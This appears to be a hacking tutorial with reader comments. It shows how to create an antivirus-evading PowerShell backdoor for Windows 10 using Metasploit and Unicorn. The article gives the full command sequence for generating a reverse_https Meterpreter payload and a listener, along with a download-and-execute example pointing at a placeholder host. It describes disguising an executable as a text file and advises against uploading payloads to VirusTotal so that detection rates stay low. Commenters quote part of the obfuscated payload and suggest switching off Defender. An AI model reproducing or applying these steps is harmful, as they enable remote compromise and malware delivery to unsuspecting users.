Hacking Windows 10: How to Create an Undetectable Payload, Part 1 (Bypassing Antivirus Software)

How to Create an Undetectable Payload, Part 1 (Bypassing Antivirus Software)

Hackers are always seeking zero-day exploits that can successfully bypass Windows 10's security features. There has been extensive research into creating undetectable malware and entire GitHub projects dedicated to automating the creation of undetectable payloads such as WinPaylods, Veil v3, and TheFatRat.

With a bit of social engineering, tricking a target user into opening a malicious file can be as simple as injecting a bit of Unicode into the file name. For example, the below GIF shows a Windows executable (EXE) disguised to appear as a normal text file (TXT) — even with "Hide extensions for known file types" disabled in the File Explorer Options.

Make no mistake, the file on the right is an executable and, more importantly, recognized by the Windows operating system as an executable. When the fake text file is clicked, it opens a new document using Notepad, the default text editor in Windows 10. After opening Notepad, it silently executes an embedded PowerShell payload (made with Unicorn) which creates a backdoor to the now compromised Windows computer.

Unicorn, created by TrustedSec, is a simple tool designed to assist penetration tester's with PowerShell downgrade attacks and injecting sophisticated shellcode payloads straight into memory. The techniques utilized by Unicorn are based on the work of Matthew Graeber and TrustedSec founder David Kennedy.

Step 1: Install Metasploit Framework

Metasploit is a dependency of Unicorn. Before installing Unicorn, I'll quickly guide readers through a Metasploit installation to ensure it's entirely up to date using the GitHub repository.

Kali does an excellent job of maintaining stable versions of Metasploit, but I'll show how to install the absolute latest version. First, remove any older versions of Metasploit that may be pre-installed in Kali.

apt-get remove metasploit-framework

Then, use cURL to download the Metasploit installer.

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

Upgrade the newly created msfinstall file permissions to ensure it will execute in Kali.

chmod 755 msfinstall

Then, execute the installer script with ./msfinstall.


Adding metasploit-framework to your repository list..OK
Updating package cache..OK
Checking for and installing update..
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
0 upgraded, 1 newly installed, 0 to remove and 124 not upgraded.
Need to get 161 MB of archives.
After this operation, 377 MB of additional disk space will be used.
Get:1 http://downloads.metasploit.com/data/releases/metasploit-framework/apt lucid/main amd64 metasploit-framework amd64 4.16.57+20180529103642.git.4.6219ce0~1rapid7-1 [161 MB]
Get:1 http://downloads.metasploit.com/data/releases/metasploit-framework/apt lucid/main amd64 metasploit-framework amd64 4.16.57+20180529103642.git.4.6219ce0~1rapid7-1 [161 MB]
Fetched 65.7 MB in 11min 39s (93.9 kB/s)
Selecting previously unselected package metasploit-framework.
(Reading database ... 145965 files and directories currently installed.)
Preparing to unpack .../metasploit-framework_4.16.57+20180529103642.git.4.6219ce0~1rapid7-1_amd64.deb ...
Unpacking metasploit-framework (4.16.57+20180529103642.git.4.6219ce0~1rapid7-1) ...
Setting up metasploit-framework (4.16.57+20180529103642.git.4.6219ce0~1rapid7-1) ...
update-alternatives: using /opt/metasploit-framework/bin/msfbinscan to provide /usr/bin/msfbinscan (msfbinscan) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfconsole to provide /usr/bin/msfconsole (msfconsole) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfd to provide /usr/bin/msfd (msfd) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfdb to provide /usr/bin/msfdb (msfdb) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfelfscan to provide /usr/bin/msfelfscan (msfelfscan) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfmachscan to provide /usr/bin/msfmachscan (msfmachscan) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfpescan to provide /usr/bin/msfpescan (msfpescan) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfrop to provide /usr/bin/msfrop (msfrop) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfrpc to provide /usr/bin/msfrpc (msfrpc) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfrpcd to provide /usr/bin/msfrpcd (msfrpcd) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfupdate to provide /usr/bin/msfupdate (msfupdate) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfvenom to provide /usr/bin/msfvenom (msfvenom) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/metasploit-aggregator to provide /usr/bin/metasploit-aggregator (metasploit-aggregator) in auto mode
Run msfconsole to get started
W: --force-yes is deprecated, use one of the options starting with --allow instead.

When the installer is completed, there will be a new metasploit-framework/ directory in the /opt directory.

Step 2: Install Unicorn

With the Metasploit installation taken care of, the Unicorn GitHub repository can be cloned using git clone github.com/trustedsec/unicorn.

git clone https://github.com/trustedsec/unicorn

Cloning into 'unicorn'...
remote: Counting objects: 340, done.
remote: Total 340 (delta 0), reused 0 (delta 0), pack-reused 340
Receiving objects: 100% (340/340), 163.94 KiB | 45.00 KiB/s, done.
Resolving deltas: 100% (215/215), done.

Then, change into the new Unicorn directory using the cd command.

cd unicorn/

To view the available Unicorn options and comprehensive descriptions of each attack, use the ./unicorn.py --help argument.

./unicorn.py --help

-------------------- Magic Unicorn Attack Vector v3.1 -----------------------------

Native x86 powershell injection attacks on any Windows platform.
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Credits: Matthew Graeber, Justin Elze, Chris Gates

Happy Magic Unicorns.

Usage: python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>
PS Example: python unicorn.py windows/meterpreter/reverse_https 443
PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
Macro Example: python unicorn.py windows/meterpreter/reverse_https 443 macro
Macro Example CS: python unicorn.py <cobalt_strike_file.cs> cs macro
Macro Example Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode macro
HTA Example: python unicorn.py windows/meterpreter/reverse_https 443 hta
HTA Example CS: python unicorn.py <cobalt_strike_file.cs> cs hta
HTA Example Shellcode: python unicorn.py <path_to_shellcode.txt>: shellcode hta
DDE Example: python unicorn.py windows/meterpreter/reverse_https 443 dde
CRT Example: python unicorn.py <path_to_payload/exe_encode> crt
Custom PS1 Example: python unicorn.py <path to ps1 file>
Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500
Cobalt Strike Example: python unicorn.py <cobalt_strike_file.cs> cs (export CS in C# format)
Custom Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode (formatted 0x00)
Help Menu: python unicorn.py --help

There are several interesting and effective Unicorn options. In this article, I'll be focusing on the PowerShell and Meterpreter solution.

Step 3: Generate the Payload

To create a payload with Unicorn, use the below command.

./unicorn.py windows/meterpreter/reverse_https <ATTACKER-IP-ADDRESS> <PORT>

Unicorn will use the Metasploit reverse_https module to connect to the attackers IP address using the specified port.

[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode...

                                          ___   /|   |//
                                      `__/\_ --(/|___/-/
                                   \|\_-\___ __-_`- /-/ \.
                                  |\_-___,-\_____--/_)' ) \
                                   \ -_ /     __ \( `( __`\|
                                   `\__|      |\)\ ) /(/|
           ,._____.,            ',--//-|      \  |  '   /
          /     __. \,          / /,---|       \       /
         / /    _. \  \        `/`_/ _,'        |     |
        |  | ( (  \   |      ,/\'__/'/          |     |
        |  \  \`--, `_/_------______/           \(   )/
        | | \  \_. \,                            \___/\
        | |  \_   \  \                                 \
        \ \    \_ \   \   /                             \
         \ \  \._  \__ \_|       |                       \
          \ \___  \      \       |                        \
           \__ \__ \  \_ |       \                         |
           |  \_____ \  ____      |                        |
           | \  \__ ---' .__\     |        |               |
           \  \__ ---   /   )     |        \              /
            \   \____/ / ()(      \          `---_       /|
             \__________/(,--__    \_________.    |    ./ |
               |     \ \  `---_\--,           \   \_,./   |
               |      \  \_ ` \    /`---_______-\   \\    /
                \      \.___,`|   /              \   \\   \
                 \     |  \_ \|   \              (   |:    |
                  \    \      \    |             /  / |    ;
                   \    \      \    \          ( `_'   \  |
                    \.   \      \.   \          `__/   |  |
                      \   \       \.  \                |  |
                       \   \        \  \               (  )
                        \   |        \  |              |  |
                         |  \         \ \              I  `
                         ( __;        ( _;            ('-_';
                         |___\        \___:            \___:


Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave

Happy Magic Unicorns.



Everything is now generated in two files, powershell_attack.txt and unicorn.rc. The text file contains  all of the code needed in order to inject the powershell attack into memory. Note you will need a place that supports remote command injection of some sort. Often times this could be through an excel/word  doc or through psexec_commands inside of Metasploit, SQLi, etc.. There are so many implications and  scenarios to where you can use this attack at. Simply paste the powershell_attack.txt command in any command prompt window or where you have the ability to call the powershell executable and it will give a shell back to you. This attack also supports windows/download_exec for a payload method instead of just Meterpreter payloads. When using the download and exec, simply put python unicorn.py windows/download_exec url=https://www.thisisnotarealsite.com/payload.exe and the powershell code will download the payload and execute.

Note that you will need to have a listener enabled in order to capture the attack.

[*] Exported powershell output code to powershell_attack.txt.
[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute and create listener.

When Unicorn is done generating the payload, two new files will be created. The first is powershell_attack.txt which can be viewed using the cat powershell_attack.txt command. This reveals the PowerShell code that will execute on the target Windows 10 machine and create the meterpreter connection.

cat powershell_attack.txt


The other file created by Unicorn is unicorn.rc, a resource file which will automate the msfconsole setup and configuration.

Step 4: Start Msfconsole Using the Resource File

To start Metasploit, run the msfconsole -r /opt/unicorn/unicorn.rc command.

msfconsole -r /opt/unicorn/unicorn.rc

       =[ metasploit v4.16.59-dev-                        ]
+ -- --=[ 1769 exploits - 1008 auxiliary - 307 post       ]
+ -- --=[ 537 payloads - 41 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[*] Processing /opt/unicorn/unicorn.rc for ERB directives.
resource (/opt/unicorn/unicorn.rc)> use multi/handler
resource (/opt/unicorn/unicorn.rc)> set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
resource (/opt/unicorn/unicorn.rc)> set LHOST
resource (/opt/unicorn/unicorn.rc)> set LPORT 443
LPORT => 443
resource (/opt/unicorn/unicorn.rc)> set ExitOnSession false
ExitOnSession => false
resource (/opt/unicorn/unicorn.rc)> set EnableStageEncoding true
EnableStageEncoding => true
resource (/opt/unicorn/unicorn.rc)> exploit -j
[*] Exploit running as background job 0.

[-] Handler failed to bind to
msf exploit(multi/handler) > [*] Started HTTPS reverse handler on

The resource file will automatically enable the handler (multi/handler), set the payload type (windows/meterpreter/reverse_https), set the attacker's IP address (LHOST), set the port number (LPORT), enable stager encoding (EnableStageEncoding), and start the msfconsole listener (exploit -j) — easy.

At this point, everything on the attacker's side is set up and ready for incoming connections. Now it's just a matter of verifying the payload works and effectively bypasses Windows Defender and antivirus software.

Step 5: Test the Payload (Don't Upload It to VirusTotal)

In my tests, Unicorn's PowerShell payload was able to bypass Google Chrome, Windows Defender, and Avast antivirus detections in a fully patched Windows 10 Enterprise machine.

Many projects warn penetration testers of the dangers of using online virus scanners like VirusTotal. In the case of TheFatRat, the developer's explicitly caution against using VirusTotal every time the program starts.

As someone who regularly experiments with many antivirus evasion software, I completely understand the temptation to know if the created payload will evade detection of the most popular antivirus software technologies. However, uploading to online virus scanners is extremely damaging to these projects. VirusTotal shares uploaded payloads with third-parties and, as a result, their collective detection rates dramatically increase over a short period of time.

As an alternative to online scanners, I encourage pentester's to simulate their target's operating system environment using virtual machines. For example, if it's discovered that a target on the local network is using Windows 10 with AVG or Avast, create a Windows 10 VM, install the latest antivirus software in the VM, and test payloads inside the VM. This will give pentester's some reassurance that a payload is working properly and prevent VirusTotal from over-analyzing the malicious file and sharing its results with other companies.

Continue to Concealing the Payload ...

That's it for installing Metasploit, creating the PowerShell payload with Unicorn, and automating the msfconsole startup. Unicorn is a great tool which takes the difficulty out of creating sophisticated PowerShell payloads capable of bypassing popular antivirus software. In my follow up article, I'll show how to convert the PowerShell code into an executable and a few tricks for making the executable appear as an ordinary text file, so stay tuned.

Cover image by Justin Meyers/Null Byte; Screenshots by tokyoneon/Null Byte


when i paste it into powershell i get the following error

/w : The term '/w' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the
spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:2

  • /w 1 /C "s''v Wi -;s''v Lm e''c;s''v Ly ((g''v Wi).value.toString()+ ...
  • ~~
  • CategoryInfo : ObjectNotFound: (/w:String) , CommandNotFoundException
  • FullyQualifiedErrorId : CommandNotFoundException

Hmmmm... interesting stuff here. Nice article. Kudos to you! I'm gonna try this out in a VM.

Thanks for the great article. At the time of testing this, my Windows 10 VM, Threat Detection 1.273.625.0 caught the payload and quarantined them. For others testing, make sure to turn off windows defender virus & threat protection to see if payloads actually work.

Lol two days ago this worked perfect. As of like 4 minutes ago this is getting flagged by Defender. The. Exe the. Bat and it gets flagged if you paste the code into cmd. :(

thank you very much for this wonderful tutorial. the payload actually bypassed my win 10 AV. but the problem is, when i run "msfconsole -r /opt/unicorn/unicorn.rc" metasploit framework comes up but there is an error line. "cannot find resource script: /opt/unicorn/unicorn.rc.

pls how can i solve that. the unicorn.rc file was created alongside the powershell_hack.txt inside the unicorn folder.

Hey Joshua, can you show me the contents of the unicorn.rc file? And what version of msfconsole are you using?

thanks for replying sir. the version of metasploit am running is 4.12.22-dev
the content of the unicorn.rc is
use multi/handler
set payload windows/meterpreter/reverse_https
set ExitOnSession false
set EnableStageEncoding true
exploit -j

i didnt uinstall and reinstall the metasploit as shown in the tutorial...maybe thats the issue, i'll do that. thank you very much

i just did the uninstalation, when im trying to i install it, i get an error when i type the command: ./msfinstall

./msfinstall: line1: 404 :: command not found. pls i need assistance, this was why i didnt uninstall it at first inorder not to av installation issues

Run the following commands and show me the outputs.

lsb_release -a
find /etc/apt/ -type f -iname \*.list -exec cat {} \;
apt-get update && apt-cache policy metasploit-framework

thanks for replying..these are the outputs:
root@kali:~# lsd_release -a
bash: lsd_release: command not found

root@kali:~# find /etc/apt/ -type f -iname \*.list -exec cat {} \;

# deb cdrom:Debian GNU/Linux 2016.1 _Kali-rolling_ - Official Snapshot amd64 LIVE/INSTALL Binary 20160830-11:29/ kali-rolling contrib main non-free

#deb cdrom:Debian GNU/Linux 2016.1 _Kali-rolling_ - Official Snapshot amd64 LIVE/INSTALL Binary 20160830-11:29/ kali-rolling contrib main non-free

root@kali:~# apt-get update && apt-cache policy metasploit-framework
Reading package lists... Done
N: Unable to locate package metasploit-framework

It looks like you're using a really old version of Kali. You should install the latest version and try following along with the tutorial again.

i dont think so, the version im using is not that old, here is it:
root@kali:~# lsb_release -a
No LSB modules are available.
Distributor ID: Kali
Description: Kali GNU/Linux Rolling
Release: kali-rolling
Codename: kali-rolling
root@kali:~# cat /etc/issue
Kali GNU/Linux Rolling \n \l
root@kali:~# uname -a
Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux

that means i have to update to 4.14 which is a recent version

Share Your Thoughts

  • Hot
  • Latest